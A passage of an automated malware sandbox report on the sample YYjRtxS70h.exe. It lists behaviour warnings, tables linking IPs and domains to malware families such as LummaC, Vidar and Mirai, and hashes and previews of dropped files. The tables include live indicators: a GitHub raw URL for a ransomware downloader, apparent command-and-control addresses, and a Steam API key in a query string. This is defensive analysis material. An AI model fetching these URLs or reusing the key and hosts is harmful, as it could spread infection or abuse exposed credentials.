                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 3576 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5608 because it is empty
                                                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6872 because it is empty
                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  02:51:52API Interceptor31x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                  02:52:11API Interceptor53x Sleep call for process: YYjRtxS70h.exe modified

                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                  • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                  http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                  37.27.43.987VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      20.233.83.145Y5kEUsYDFr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe

                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      raw.githubusercontent.comfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      Navan - Itinerary.pdf.scr.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      BigProject.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      github.comfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      ORDER-241221K6890PF57682456POC7893789097393.j.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      58VSNPxrI4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      ep_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      steamcommunity.commgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                      xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      UNINETAZnshmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 37.27.50.214
                                                                                                                                                                                                                      nshmpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 37.27.50.208
                                                                                                                                                                                                                      7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 37.27.43.98
                                                                                                                                                                                                                      7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 37.27.43.98
                                                                                                                                                                                                                      sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 37.26.35.119
                                                                                                                                                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                      • 37.27.238.92
                                                                                                                                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                      • 37.27.123.72
                                                                                                                                                                                                                      exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                                      • 185.80.172.199
                                                                                                                                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                      • 37.27.123.72
                                                                                                                                                                                                                      ________.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                      • 37.27.123.72
                                                                                                                                                                                                                      AKAMAI-ASUSmgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 23.222.144.153
                                                                                                                                                                                                                      loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 104.72.108.202
                                                                                                                                                                                                                      loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 23.79.17.106
                                                                                                                                                                                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                      • 23.217.44.145
                                                                                                                                                                                                                      mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                      • 23.57.209.219
                                                                                                                                                                                                                      m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                      • 104.119.158.106
                                                                                                                                                                                                                      MICROSOFT-CORP-MSN-AS-BLOCKUSClient-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                      • 20.107.53.25
                                                                                                                                                                                                                      armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 40.112.151.235
                                                                                                                                                                                                                      gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      • 204.79.197.219
                                                                                                                                                                                                                      trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      • 204.79.197.219
                                                                                                                                                                                                                      armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.202.12.183
                                                                                                                                                                                                                      2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.78.208.111
                                                                                                                                                                                                                      loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 20.208.252.17
                                                                                                                                                                                                                      loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                      • 20.234.251.100
                                                                                                                                                                                                                      arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                      • 21.152.225.5
                                                                                                                                                                                                                      arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                      • 40.113.41.15

                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0enTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                      • 20.233.83.145
                                                                                                                                                                                                                      • 185.199.110.133
                                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99
                                                                                                                                                                                                                      9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                      • 149.154.167.99

                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeTtok18.exeGet hashmaliciousVidarBrowse

                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYjRtxS70h.exe.log

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):1058
                                                                                                                                                                                                                        Entropy (8bit):5.356262093008712
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                                                                                                                        MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                                                                                                                        SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                                                                                                                        SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                                                                                                                        SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199804377619[1].htm

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3254)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):35590
                                                                                                                                                                                                                        Entropy (8bit):5.369516523910706
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:25pq/Ku4fmBC5ReOpqwczzQlFDaXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJYp:258/Ku4fmBC5ReOpqVaDaXfsW9l+X9hU
                                                                                                                                                                                                                        MD5:59CCD711F973D1DFEE4EA4A63982DDA0
                                                                                                                                                                                                                        SHA1:016FF421194218E9827A0A71A870B3A12A98351B
                                                                                                                                                                                                                        SHA-256:09C585F6464356DD296DE9585EF3CCCF0F2475ADE542656E5041AE9BE0D064FA
                                                                                                                                                                                                                        SHA-512:FBEBCD6958D0484A48DE0B074E06B68E45990CA2C7F2D7F96CE8491C22D7DE652EC8B783076ED8358F38FC32E5E8AE3050167792E761832A45B09C78DDE5AE37
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: p1up1 https://37.27.43.98|</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LX

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\76561199804377619[1].htm

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3254)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):35590
                                                                                                                                                                                                                        Entropy (8bit):5.369516369908107
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:25pq/Ku4fmBC5ReOpqwczzQlFDaXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJYl:258/Ku4fmBC5ReOpqVaDaXfsW9l+X9hI
                                                                                                                                                                                                                        MD5:EC02A148AB42B542663D918C619429C6
                                                                                                                                                                                                                        SHA1:49B3118223BD91B3ABAFADA8A4B523E5E0559FCE
                                                                                                                                                                                                                        SHA-256:78D3702AC5E051FBE48DB1509EA83B96CFE4219BC0630F6788C243AAB4436F66
                                                                                                                                                                                                                        SHA-512:D8B10AD18D1B0197F909D719E3FDAFD042435F07A1C10C0D6B8D7437C8D20AEEEE994C1DAC191AA6811A983C356B2D662B9C3329B40A7DE490859749D58DE7ED
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: p1up1 https://37.27.43.98|</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LX

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:@...e...........................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0c4sbize.gt5.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0fimw0nw.epw.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44azgeaa.mu5.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dvcmsww.5jr.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqrrzbsa.01l.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
